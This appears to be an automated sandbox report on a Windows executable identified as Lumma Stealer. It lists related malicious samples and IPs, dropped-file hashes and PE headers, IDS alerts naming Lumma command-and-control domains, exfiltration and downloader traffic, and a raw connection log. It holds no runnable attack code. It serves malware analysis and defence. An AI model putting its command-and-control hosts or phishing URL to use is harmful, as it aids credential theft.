                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.96.3
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CLOUDFLARENETUShttps://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 104.18.11.207
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.96.3
                                                                          oZ7nac01Em.exeGet hashmaliciousStealc, VidarBrowse
                                                                          • 188.114.97.3
                                                                          Proposal From Wachler & Associates PC.pdfGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                          • 188.114.96.3
                                                                          IM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                                                          • 104.20.22.46
                                                                          1bE8S5sN9S.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                          • 104.20.4.235
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                          • 172.64.41.3
                                                                          gMd6of50Do.exeGet hashmaliciousBlank GrabberBrowse
                                                                          • 162.159.136.232
                                                                          El9HaBFrFM.exeGet hashmaliciousBlank GrabberBrowse
                                                                          • 162.159.128.233
                                                                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                          • 185.215.113.206
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 185.215.113.16
                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                          • 185.215.113.206
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 185.215.113.16
                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                          • 185.215.113.206
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 185.215.113.206
                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                          • 185.215.113.206
                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                          • 185.215.113.206
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                          • 185.215.113.16
                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                          • 185.215.113.206
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          Lana_Rhoades_Photoos.jsGet hashmaliciousUnknownBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                          • 188.114.97.3
                                                                          a.htaGet hashmaliciousDarkComet, DarkTortilla, NeshtaBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.97.3
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exefile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                            Process:C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exe
                                                                            File Type:CSV text
                                                                            Category:dropped
                                                                            Size (bytes):226
                                                                            Entropy (8bit):5.360398796477698
                                                                            Encrypted:false
                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                            MD5:3A8957C6382192B71471BD14359D0B12
                                                                            SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                            SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                            SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1401395
                                                                            Entropy (8bit):7.958265581257006
                                                                            Encrypted:false
                                                                            SSDEEP:24576:GsT8RVx3hEKP5mzBkSc2mUqjnwe0ev47IRh72/abEBj17aWnlnLhED2HjV:gVx3hEe5mhWLwZev9RZ2/fF1nz
                                                                            MD5:D7B587FD36E6DA29CC6FD4F3D06033E6
                                                                            SHA1:B64A6BD896A590C5CDF45ECC6F586ED9F39B178C
                                                                            SHA-256:AF37C4BA1FBE5C05CDE57E1D37DA21A0CDC154353C6700DD3202ED763EBE6BAE
                                                                            SHA-512:E94246A81155F4A1A78BAC128AD41D882767EAE30F44F52884E0B871257C1B4EDBD2C547B821339D29A774840C60293DBEBA26296C4ECFAE3C0E366513CAA8F5
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Reputation:low
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................J...........@...........................K.....2.....@.................................W...k.......D.....................J.............................t.J..................................................... . ............................@....rsrc...D...........................@....idata ............................@... .p*.........................@...whlejstb..... 1.....................@...gsptuyyn......J.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2822144
                                                                            Entropy (8bit):6.454172444055013
                                                                            Encrypted:false
                                                                            SSDEEP:24576:bRPQLGuAYVuI5u1hCh4srH/gMA09GUYw9TWac9SjDjaCJjDj9QJ+dKQSbziAuruK:HI5cCesYfUhW7bsmlb18mQZ8rcE
                                                                            MD5:69621666073B77F9D5D771808DC1A7A6
                                                                            SHA1:32EF532AE1C90A8C74B3A6C0D1134F8116AE9BC2
                                                                            SHA-256:0EFA9CAC51FA334FA1EBEE313DB11BD08D65FFDF4ED573CDECF071B4FCE96B2E
                                                                            SHA-512:67D693DC48FB29A3A4269B2DB241449B03476C9588C72A704652E7E97D79D5CEED1941F62B7CBD8050ACC335646B683D5F99F6FC8B2629CF8CA0C7E5671A1EDA
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Joe Sandbox View:
                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                            Reputation:low
                                                                            Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ........................+......6+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...gwksigml..*.......*..:..............@...xtwnmccs. ...`+.......*.............@....taggant.@....+.."....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):6.547039957169838
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:file.exe
                                                                            File size:2'940'416 bytes
                                                                            MD5:90a33d2fa972c6879876cfd76b3bb7f2
                                                                            SHA1:bde748d82306d4e3807b87fd23486b9b2e85bf8d
                                                                            SHA256:1eea8b150ca28b1b58a43dfbe65e9949cfa563df212e1c43929931750f047180
                                                                            SHA512:97204ec0dddc24c05349698e2d60e9f00e9d25bdb8ffc9d4dc47e5a53cb7a2ab0b687ece0bbb27a918a6268b9c7cbb3ecbb4b8440ceaf73f8ff2f20a93c1d347
                                                                            SSDEEP:49152:2oMlzszBa1BfpdSh5BGot8gFpD5DwXaOI+S25hIORmbAiGLlew7:2oqsNajBdSh5BGoeA9NLOI+GO0c
                                                                            TLSH:A1D53A92B509B2CBD0CE17B8D517CE829D5D83F9671049C3A86CA8BEBDB7CC115B5C28
                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............/...........@.......................... 0.......-...@.................................T...h..
                                                                            Icon Hash:00928e8e8686b000
                                                                            Entrypoint:0x6ff000
                                                                            Entrypoint Section:.taggant
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                            Instruction
                                                                            jmp 00007F65B4D1585Ah
                                                                            bsf ebp, dword ptr [eax+eax]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            jmp 00007F65B4D17855h
                                                                            add byte ptr [0000000Ah], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], dh
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], 00000000h
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            or dword ptr [eax+00000000h], eax
                                                                            add byte ptr [eax], al
                                                                            adc byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add eax, 0000000Ah
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], dh
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], ah
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [ecx], ah
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [ecx], al
                                                                            add byte ptr [eax], 00000000h
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            adc byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add eax, 0000000Ah
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], dl
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [ebx], al
                                                                            or al, byte ptr [eax]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax+eax*4], cl
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            adc byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add eax, 0000000Ah
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], dh
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax+00000000h], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [ecx], al
                                                                            add byte ptr [eax], 00000000h
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x590000x340.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            0x10000x580000x27e00b7c8f84bfe2a93bac38b7dfbd4076970False0.9979917711598746OpenPGP Public Key7.973473510765359IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x590000x3400x400914cd139a383496d0085d499d138ef92False0.390625data4.997389973748798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            hdsdqunw0x5b0000x2a30000x2a2200e45e33bffcf6d2f36eb6450462160db7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            hndbucrw0x2fe0000x10000x600f85f505784d6553efbf93d2de705ecc3False0.599609375data5.134682129610304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .taggant0x2ff0000x30000x2200293aa3a8a318f0e86f868524366dce37False0.07284007352941177DOS executable (COM)0.9399455359732425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_MANIFEST0x590580x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397
                                                                            DLLImport
                                                                            kernel32.dlllstrcpy
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-10-31T20:48:57.720337+01002057131ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)1192.168.2.6631311.1.1.153UDP
                                                                            2024-10-31T20:48:57.734269+01002057129ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)1192.168.2.6509871.1.1.153UDP
                                                                            2024-10-31T20:48:57.748624+01002057127ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)1192.168.2.6614671.1.1.153UDP
                                                                            2024-10-31T20:48:57.759260+01002057125ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)1192.168.2.6538621.1.1.153UDP
                                                                            2024-10-31T20:48:57.770803+01002057123ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)1192.168.2.6527431.1.1.153UDP
                                                                            2024-10-31T20:48:58.448758+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649709188.114.97.3443TCP
                                                                            2024-10-31T20:48:58.448758+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649709188.114.97.3443TCP
                                                                            2024-10-31T20:48:59.142708+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649709188.114.97.3443TCP
                                                                            2024-10-31T20:48:59.142708+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649709188.114.97.3443TCP
                                                                            2024-10-31T20:48:59.810598+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649710188.114.97.3443TCP
                                                                            2024-10-31T20:48:59.810598+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710188.114.97.3443TCP
                                                                            2024-10-31T20:49:00.303597+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649710188.114.97.3443TCP
                                                                            2024-10-31T20:49:00.303597+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710188.114.97.3443TCP
                                                                            2024-10-31T20:49:01.168646+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649712188.114.97.3443TCP
                                                                            2024-10-31T20:49:01.168646+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712188.114.97.3443TCP
                                                                            2024-10-31T20:49:02.812504+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649713188.114.97.3443TCP
                                                                            2024-10-31T20:49:02.812504+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649713188.114.97.3443TCP
                                                                            2024-10-31T20:49:04.206088+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649715188.114.97.3443TCP
                                                                            2024-10-31T20:49:04.206088+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649715188.114.97.3443TCP
                                                                            2024-10-31T20:49:06.002696+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649716188.114.97.3443TCP
                                                                            2024-10-31T20:49:06.002696+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649716188.114.97.3443TCP
                                                                            2024-10-31T20:49:06.517646+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649716188.114.97.3443TCP
                                                                            2024-10-31T20:49:07.653171+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649727188.114.97.3443TCP
                                                                            2024-10-31T20:49:07.653171+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649727188.114.97.3443TCP
                                                                            2024-10-31T20:49:10.361047+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649743188.114.97.3443TCP
                                                                            2024-10-31T20:49:10.361047+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649743188.114.97.3443TCP
                                                                            2024-10-31T20:49:11.041358+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649743188.114.97.3443TCP
                                                                            2024-10-31T20:49:11.988767+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.649749185.215.113.1680TCP
                                                                            2024-10-31T20:49:13.867958+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.649757TCP
                                                                            2024-10-31T20:49:51.689201+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.649953TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 31, 2024 20:48:57.799423933 CET49709443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:57.799453020 CET44349709188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:57.799541950 CET49709443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:57.802635908 CET49709443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:57.802647114 CET44349709188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:58.448601961 CET44349709188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:58.448757887 CET49709443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:58.499861002 CET49709443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:58.499881983 CET44349709188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:58.500138044 CET44349709188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:58.552548885 CET49709443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:58.688385963 CET49709443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:58.688411951 CET49709443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:58.688461065 CET44349709188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:59.142721891 CET44349709188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:59.142921925 CET44349709188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:59.142999887 CET49709443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:59.144778013 CET49709443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:59.144793034 CET44349709188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:59.144808054 CET49709443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:59.144813061 CET44349709188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:59.190640926 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:59.190670013 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:59.190740108 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:59.191021919 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:59.191034079 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:59.810498953 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:59.810597897 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:59.811950922 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:59.811954975 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:59.812151909 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:48:59.813518047 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:59.813535929 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:48:59.813571930 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.303603888 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.303828955 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.303858995 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.303886890 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.303894997 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.303908110 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.303949118 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.304630995 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.304665089 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.304676056 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.304682016 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.304723024 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.304728985 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.308505058 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.308623075 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.308629036 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.349415064 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.423677921 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.424113989 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.424148083 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.424161911 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.424171925 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.424211979 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.424217939 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.424242020 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.424288034 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.424309015 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.424319983 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.424341917 CET49710443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.424348116 CET44349710188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.551265955 CET49712443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.551306963 CET44349712188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:00.551381111 CET49712443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.551692963 CET49712443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:00.551707983 CET44349712188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:01.168579102 CET44349712188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:01.168646097 CET49712443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:01.183527946 CET49712443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:01.183549881 CET44349712188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:01.183763027 CET44349712188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:01.186611891 CET49712443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:01.187056065 CET49712443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:01.187089920 CET44349712188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:01.568173885 CET44349712188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:01.568264961 CET44349712188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:01.568319082 CET49712443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:01.652641058 CET49712443192.168.2.6188.114.97.3
